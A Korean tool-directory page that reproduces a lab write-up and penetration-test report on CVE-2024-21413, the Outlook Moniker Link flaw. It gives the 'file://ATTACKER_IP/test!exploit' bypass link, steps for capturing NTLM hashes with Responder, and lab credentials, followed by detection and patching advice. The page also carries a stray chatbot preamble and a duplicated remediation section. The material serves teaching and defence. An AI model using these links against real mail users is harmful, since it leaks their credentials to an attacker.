Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook- — 2024년 2월 13일, Microsoft는 CVE-2024-21413으로 식별되며 Moniker Link Vulnerability로 알려진 Microsoft Outlook의 심각한 보안 취약점을 공개했습니다. 이 취약점을 통해 공격자는 Outlook의 Protected View 메커니즘을 우회할 수 있습니다. | Kitploit
도구/GitHubGitHub/eylommaayan/thm---cve-2024-21413-moniker-link-microsoft-outlook-
Vulnerability AnalysisExploitationPenetration TestingLearning & EducationEmail SecurityLabs & Practice
GitHubeylommaayan/thm---cve-2024-21413-moniker-link-microsoft-outlook-

THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

2024년 2월 13일, Microsoft는 CVE-2024-21413으로 식별되며 Moniker Link Vulnerability로 알려진 Microsoft Outlook의 심각한 보안 취약점을 공개했습니다. 이 취약점을 통해 공격자는 Outlook의 Protected View 메커니즘을 우회할 수 있습니다.

저장소 보기
78개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

2024년 2월 13일, Microsoft는 Microsoft Outlook에서 심각한 보안 취약점을 공개했습니다. 이 취약점은 CVE-2024-21413로 식별되며 Moniker Link Vulnerability로 알려져 있습니다. 이 취약점은 공격자가 Outlook의 Protected View 메커니즘을 우회할 수 있게 합니다.

image

훌륭합니다 👍

다음은 전체 번역 + 침투 테스트(PT) 보고서 작성이며, 전문적이고 명확한 히브리어로 작성되었습니다. 요청하신 대로 – 번역과 작성만 포함되어 있습니다. 답변, 스크린샷, 완성 내용은 직접 추가하시면 되고, 원하시면 나중에 도와드리겠습니다.


침투 테스트 보고서

CVE-2024-21413 – Moniker Link (Microsoft Outlook)


🧩 경영진 요약 (Executive Summary)

2024년 2월 13일, Microsoft는 Microsoft Outlook에서 심각한 보안 취약점을 공개했으며, 이 취약점은 CVE-2024-21413 식별자를 부여받았고 Moniker Link Vulnerability로 알려져 있습니다.

이 취약점은 특수 링크(Moniker Link)를 통해 공격자가 Outlook의 Protected View 메커니즘을 우회하고, 피해자의 Outlook 클라이언트가 로그인 자격 증명(NTLM hash) 을 공격자가 제어하는 서버로 보내도록 합니다 – 파일 실행이나 효과적인 보안 경고 없이 말입니다.

이 취약점은 자격 증명 유출로 이어질 수 있으며, 이론적으로는 원격 코드 실행(RCE) 가능성도 존재합니다.


📌 취약점 세부 정보

매개변수값
취약점 IDCVE-2024-21413
게시 날짜2024년 2월 13일
발견자Haifei Li – Check Point Research
영향자격 증명 유출 + 잠재적 RCE
심각도Critical
공격 복잡성낮음
CVSS 점수9.8
공식 링크https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21413

🎯 영향을 받는 버전

이 취약점은 다음 버전에 영향을 미칩니다:

  • Microsoft Office LTSC 2021 – 버전 19.0.0부터
  • Microsoft 365 Apps for Enterprise – 버전 16.0.1부터
  • Microsoft Office 2019 – 버전 16.0.1부터
  • Microsoft Office 2016 – 버전 16.0.5435.1001 이전

🎓 학습 목표 (Learning Objectives)

  • 취약점 작동 방식 이해
  • Outlook Protected View 메커니즘 숙지
  • 취약점을 악용한 자격 증명 유출
  • 탐지 방법 (Detection)
  • 예방 권장 사항 (Mitigation)

(취약점 설명)

image

Microsoft Outlook은 HTML 형식의 이메일 표시와 http:// 및 https://와 같은 다양한 유형의 링크 분석을 지원합니다. 또한 Outlook은 Moniker Links라고 하는 특수 링크도 지원하며, 이를 통해 운영 체제에서 애플리케이션을 실행하거나 외부 리소스에 액세스할 수 있습니다.

정상적인 경우, 이메일에 외부 애플리케이션을 실행하거나 시스템 리소스(예: file:// 링크)에 접근하는 링크가 포함되어 있으면 Outlook의 보안 메커니즘인 Protected View가 활성화됩니다. 이 메커니즘은 보안 경고를 표시하고 코드 실행, 매크로 또는 외부 네트워크 리소스에 대한 접근과 같은 위험한 작업을 차단합니다.

그러나 Outlook(CVE-2024-21413)에서 Moniker Link 유형의 링크를 간단히 조작하여 Protected View 메커니즘을 우회할 수 있는 취약점이 발견되었습니다.

발견 사항 (Findings)

테스트 중에 일반적인 유형의 링크를 사용하면 다음이 확인되었습니다.

file://ATTACKER_IP/test

Outlook이 SMB 프로토콜을 통해 네트워크 리소스에 접근을 시도하게 만들지만, 이 시도는 Protected View에 의해 차단됩니다.

반면, 링크에 특수 문자 !와 추가 텍스트 문자열이 포함된 경우, 예를 들어:

file://ATTACKER_IP/test!exploit

Outlook은 Protected View를 실행하지 않고 원격 서버에 대한 연결을 시도합니다.

이 시도 과정에서:

  • Outlook이 SMB를 통해 리소스에 접근을 시도합니다
  • 자동 인증 요청이 수행됩니다
  • 사용자의 로그인 자격 증명이 공격자에게 전송됩니다
  • 피해자의 Windows netNTLMv2 해시가 캡처됩니다

원격 공유가 실제로 존재할 필요는 없다는 점에 유의하세요. 인증 시도는 어차피 수행되기 때문입니다.

영향 (Impact)

이 취약점을 통해 공격자는 다음을 수행할 수 있습니다:

  • 사용자 자격 증명(netNTLMv2 hash) 유출
  • 오프라인 공격(Cracking / Pass-the-Hash) 수행
  • 기업 네트워크에서의 측면 이동

또한 Moniker Links는 Windows의 COM(Component Object Model) 메커니즘을 사용하므로 이론적으로 원격 코드 실행(RCE) 가능성이 존재합니다. 그러나 테스트 시점 기준으로 이 취약점을 통한 실제 RCE 구현에 대한 공개 PoC(Proof of Concept)는 존재하지 않습니다.

취약점 악용 (Exploitation)

공격 시나리오에서 피해자에게 이전 작업에서 제시된 것과 유사한 Moniker Link가 포함된 이메일이 전송됩니다. 공격자의 목표는 Outlook의 Protected View 메커니즘을 우회하는 Moniker Link가 포함된 이메일을 만들어, 피해자가 링크를 클릭하는 즉시 피해자의 Outlook 클라이언트가 공격자의 머신에서 파일을 로드하도록 하는 것입니다. 이로 인해 피해자의 netNTLMv2 해시가 전송되어 공격자에게 캡처됩니다.

공격을 수행하기 전에 데모 목적으로 작성된 PoC(Proof of Concept)를 살펴보겠습니다. (GitHub에서도 확인할 수 있습니다.)

작성자: CMNatic | https://github.com/cmnatic 버전: 1.0 | 19/02/2024

코드는 Python을 사용하며 악성 Moniker Link가 포함된 HTML 이메일을 전송합니다.

PoC 설명

PoC:

  • 공격자의 이메일 주소와 피해자의 이메일 주소를 받습니다
  • SMTP 인증을 위해 비밀번호가 필요합니다
  • (이 방에서 [email protected]의 비밀번호는 attacker입니다)
  • 이메일의 HTML 콘텐츠(html_content)와 악성 Moniker Link를 포함합니다
  • 이메일 필드(Subject, From, To)를 설정합니다
  • 메일 서버를 통해 이메일을 전송합니다

실제 시나리오에서는 공격자가 제어하는 SMTP 서버가 필요합니다. (이 방에서는 서버가 이미 제공됩니다.)

해시 캡처를 위한 리스닝 – Responder

이메일을 보낸 후, SMB 요청을 캡처하기 위해 공격자 머신에서 Responder와 같은 리스닝 도구를 실행해야 합니다.

THM AttackBox에서 인터페이스 이름은 ens5입니다:

responder -I ens5

Responder는 SMB, LLMNR 및 NBT-NS 요청을 수신하며 인증 자격 증명을 캡처할 수 있게 합니다.

피해자 머신 열기

  • 분할 화면(split-screen) 창을 통해 피해자 머신을 엽니다
  • Outlook을 실행합니다
  • "I don't want to sign in or create an account" 옵션을 선택합니다
  • 제품 키 입력 창을 닫습니다
  • 피해자의 사서함은 이미 사전 구성되어 있습니다

Exploit 실행

AttackBox에서:

  • exploit.py라는 새 파일을 만듭니다
  • PoC 코드를 붙여넣습니다
  • 실행 전에 다음을 조정해야 합니다:
  • Moniker Link 내의 공격자 머신 IP 주소를 업데이트합니다 (12번째 줄)
  • MAILSERVER 값을 다음 주소로 변경합니다:

10.64.165.67

그런 다음 실행합니다:

python3 exploit.py

비밀번호를 묻는 메시지가 표시되면 다음을 입력합니다:

attacker

작업이 성공하면 다음 메시지가 표시됩니다:

Email delivered

결과

피해자 머신에서 이메일을 열고 "Click me" 링크를 클릭하면:

  • Outlook이 SMB를 통해 공격자 머신에 연결을 시도합니다
  • Responder가 인증 시도를 포착합니다
  • 사용자의 netNTLMv2 해시가 성공적으로 캡처됩니다
  • 공격이 성공적으로 완료되었습니다.
image

탐지

YARA

Florian Roth가 작성한 YARA 규칙은 Moniker Link 내에 file:\ 요소가 포함된 이메일을 탐지하기 위한 것으로, 이는 CVE-2024-21413 악용 시도를 나타낼 수 있습니다.

YARA 규칙의 예(방에 표시된 대로):

이 규칙은 이메일의 일반적인 헤더(예: Subject: 및 Received:)를 검색합니다.

또한 UNC 경로(\)를 가리키는 file:// 링크의 의심스러운 패턴과 일반적인 파일 확장자, 그리고 끝에 있는 ! 문자(Protected View 우회 특성)를 검색합니다.

(코드 자체는 원본 그대로 유지됩니다)

Wireshark

또한 Wireshark의 패킷 캡처에서 피해자 머신에서 공격자 머신으로 나가는 SMB 요청을 볼 수 있습니다.

요청 과정에서:

  • SMB 인증 시도가 수행됩니다
  • netNTLMv2 해시를 식별할 수 있습니다(때로는 잘린/truncated 형태로)

수정

예방 및 강화 (Remediation)

Microsoft는 2월 Patch Tuesday 업데이트의 일부로 이 취약점을 해결하기 위한 보안 업데이트를 포함했습니다. Office 버전별 관련 KB 문서 목록은 Microsoft 공식 링크에서 확인할 수 있습니다.

다음 방법을 통해 Microsoft Office를 업데이트하는 것이 좋습니다:

  • Windows Update
  • Microsoft Update Catalog

또한 모든 시스템에 업데이트가 완료될 때까지 기본적인 정보 보안 관행을 적용하고, 특히 사용자 인식을 높이는 것이 중요합니다. 예를 들어:

  • 예상치 못한 이메일, 특히 무작위 링크를 클릭하지 않기
  • 클릭하기 전에 링크 미리보기 확인
  • 의심스러운 이메일을 조직의 정보 보안 담당자에게 전달

이 취약점은 Outlook의 Protected View 메커니즘을 우회하므로 구성 변경만으로는 Outlook이 이 공격을 차단하도록 설정할 수 없습니다.

또한 SMB 프로토콜은 네트워크 리소스 및 파일 공유에 접근하는 데 필수적이므로 대부분의 조직에서 SMB를 완전히 차단하는 것은 권장되지 않습니다. 그러나 조직 정책과 네트워크 구조에 따라 방화벽 수준에서 차단 또는 제한을 구현할 수는 있습니다.

예방 및 강화 (Remediation)

Microsoft는 2월 Patch Tuesday 업데이트의 일부로 이 취약점에 대한 보안 수정 사항을 포함했습니다. Office 버전에 따른 관련 KB 문서 목록은 Microsoft 공식 링크에서 확인할 수 있습니다. Microsoft Office 업데이트를 강력히 권장합니다:

  • Windows Update
  • Microsoft Update Catalog

또한 모든 시스템에 업데이트가 적용될 때까지 기본적인 정보 보안 관행을 적용하고, 특히 사용자 인식을 높이는 것이 중요합니다. 예를 들어:

  • 예상치 못한 이메일, 특히 무작위 링크 클릭 자제
  • 클릭 전 링크 주소(미리보기) 확인
  • 의심스러운 이메일을 조직의 정보 보안 담당자에게 전달

이 취약점은 Outlook의 Protected View 메커니즘을 우회하므로 Outlook 자체의 구성 변경만으로는 공격을 방지할 수 없습니다.

또한 SMB 프로토콜은 파일 공유 및 네트워크 리소스에 접근하는 데 필수적이므로 대부분의 조직에서 SMB를 완전히 차단하는 것은 권장되지 않습니다. 그러나 보안 정책과 기업 네트워크 구조에 따라 방화벽 수준에서 제한 또는 차단을 구현할 수는 있습니다.

도구 다운로드